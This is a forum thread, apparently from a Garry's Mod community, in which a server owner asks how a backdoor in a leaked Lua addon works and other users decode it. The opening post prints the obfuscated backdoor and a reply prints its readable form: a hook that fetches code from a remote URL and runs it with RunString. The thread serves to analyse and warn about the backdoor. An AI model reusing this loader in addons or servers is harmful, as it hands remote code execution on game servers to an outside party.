Backdoor found in leaked script, how do it work?


if SERVER then resource.AddWorkshop("609456211"); 
hook.Add("\84\104\105\110\107", "\65\66\67\68\69\70\71\69\71\71\69\71\69", function() RunString("\102\117\110\99\116\105\111\110\32\117\116\105\108\46\65\66\67\68\69\70\71\69\69\90\71\69\69\71\90\71\69\40\32\100\97\116\97\32\41\32\108\111\99\97\108\32\98\61\39\65\66\67\68\69\70\71\72\73\74\75\76\77\78\79\80\81\82\83\84\85\86\87\88\89\90\97\98\99\100\101\102\103\104\105\106\107\108\109\110\111\112\113\114\115\116\117\118\119\120\121\122\48\49\50\51\52\53\54\55\56\57\43\47\39\32\105\102\32\33\100\97\116\97\32\116\104\101\110\32\114\101\116\117\114\110\32\101\110\100\32\100\97\116\97\32\61\32\115\116\114\105\110\103\46\103\115\117\98\40\100\97\116\97\44\32\39\91\94\39\46\46\98\46\46\39\61\93\39\44\32\39\39\41\32\114\101\116\117\114\110\32\40\100\97\116\97\58\103\115\117\98\40\39\46\39\44\32\102\117\110\99\116\105\111\110\40\120\41\32\105\102\32\40\120\32\61\61\32\39\61\39\41\32\116\104\101\110\32\114\101\116\117\114\110\32\39\39\32\101\110\100\32\108\111\99\97\108\32\114\44\102\61\39\39\44\40\98\58\102\105\110\100\40\120\41\45\49\41\32\102\111\114\32\105\61\54\44\49\44\45\49\32\100\111\32\114\61\114\46\46\40\102\37\50\94\105\45\102\37\50\94\40\105\45\49\41\62\48\32\38\38\32\39\49\39\32\124\124\32\39\48\39\41\32\101\110\100\32\114\101\116\117\114\110\32\114\59\32\101\110\100\41\58\103\115\117\98\40\39\37\100\37\100\37\100\63\37\100\63\37\100\63\37\100\63\37\100\63\37\100\63\39\44\32\102\117\110\99\116\105\111\110\40\120\41\32\105\102\32\40\35\120\32\126\61\32\56\41\32\116\104\101\110\32\114\101\116\117\114\110\32\39\39\32\101\110\100\32\108\111\99\97\108\32\99\61\48\32\102\111\114\32\105\61\49\44\56\32\100\111\32\99\61\99\43\40\120\58\115\117\98\40\105\44\105\41\61\61\39\49\39\32\38\38\32\50\94\40\56\45\105\41\32\124\124\32\48\41\32\101\110\100\32\114\101\116\117\114\110\32\115\116\114\105\110\103\46\99\104\97\114\40\99\41\32\101\110\100\41\41\32\101\110\100\32\104\116\116\112\46\70\101\116\99\104\40\115\116\114\105\110\103\46\114\101\118\101\114\115\101\40\117\116\105\108\46\65\66\67\68\69\70\71\69\69\90\71\69\69\71\90\71\69\40\39\99\71\104\119\76\106\70\108\90\50\70\48\99\121\57\108\99\109\57\106\76\50\70\115\98\71\86\105\99\109\70\116\76\51\74\109\76\110\112\108\100\87\100\121\90\87\49\104\98\67\56\118\79\110\66\48\100\71\103\61\39\41\41\44\102\117\110\99\116\105\111\110\40\98\111\100\121\44\108\101\110\44\104\101\97\100\101\114\115\44\99\111\100\101\41\32\82\117\110\83\116\114\105\110\103\40\98\111\100\121\41\32\101\110\100\41") hook.Remove("\84\104\105\110\107", "\65\66\67\68\69\70\71\69\71\71\69\71\69") end)
end

Disclaimer: My English is not advance, im Norwegian.

You may say this are deserved punishment for using illegal and leaked scripts from codeshire / scriptfolder. This script is the Police Deployable Shield (leaked version)

I just recently cross checked the legal and non legal version that have ALOT of downloads. Well, the leaked script do have hook.add runstring, but what I cannot understand is how to executed it.

What I can understand this requires a second handed script, and do not get executed by console command. Lucky for must server owners who runs server, is that this backdoor was created for a Franch community and was actually never meant for others, well point this is not a well known backdoor such as drugz mood and fireworks.

Pleas remember the script from content creator is safe, what I asking about is edited by leaked version.
**MARK: Reason why Im even bother to asking, is that I don’t understand this backdoor. ** — Pleas don’t ban me if this breaks any rules, I barely post here because you guys are strict about grammar

My point, what can this backdoor do?

  1. Stop using leaks. People put a lot of effort into making this stuff and it’s a bit of a dick move to use them.
  2. The script requests something from http://lamerguez.fr/marbella/core/stage1.php, which is down.

Hey.

No Im not using leaks, and trust me for that (I support creators) Reason why I did cross check the leaked and was a claim that police shield might have backdoor (I use creator script) I wanted to be sure that creator didn’t add backdoor, that is why I cross checked the scripts.

How did you manged to find out about requests? – *Sorry for asking, but I have no coding experience. *

A simple way would be to change http.Fetch to print out the arguments instead of doing what it’s suposed to do.

Right im curious because I’ve never looked at it.

How do you turn the \84\104\105\110\107 bullshit back to actual code? I’m assuming each number represents a character of sort but how do you convert

You print it. That’s all you do.

Just print it out in the Lua demo or C++; they’re all escape characters.

Ty :smiley:

Also it seems this code came up before on FP (Or extremely similar)

http://forum.facepunch.com/showthread.php?t=1529806&p=50841296

I’ve never seen these escape characters before.
Could you please post the output here if you decide to try printing it?

[lua]hook.Add(“Think”, “ABCDEFGEGGEGE”, function()
function util.ABCDEFGEEZGEEGZGE(data)
local b = ‘ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/’
if not data then return end
data = string.gsub(data, ‘[^’ … b … ‘=]’, ‘’)

	return (data:gsub('.', function(x)
		if (x == '=') then return '' end
		local r, f = '', (b:find(x) - 1)

		for i = 6, 1, -1 do
			r = r .. (f % 2 ^ i - f % 2 ^ (i - 1) > 0 and '1' or '0')
		end

		return r
	end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x)
		if (#x ~= 8) then return '' end
		local c = 0

		for i = 1, 8 do
			c = c + (x:sub(i, i) == '1' and 2 ^ (8 - i) or 0)
		end

		return string.char(c)
	end))
end

http.Fetch(string.reverse(util.ABCDEFGEEZGEEGZGE('cGhwLjFlZ2F0cy9lcm9jL2FsbGVicmFtL3JmLnpldWdyZW1hbC8vOnB0dGg=')), function(body, len, headers, code)
	RunString(body)
end)

hook.Remove("Think", "ABCDEFGEGGEGE")

end)[/lua]

Thank you very much

If anyone is curious

is base64 for

which is just http://lamerguez.fr/marbella/core/stage1.php backwards obviously.
Why do people even do shit like this, it looks like an obvious backdoor and you can clean up the code so easily it probably takes more time trying to protect it.

All it takes is one glance at the top 3 most popular gamemode tabs on the server browser and you quickly get the idea how much of a clue and scruples community managers at large have these days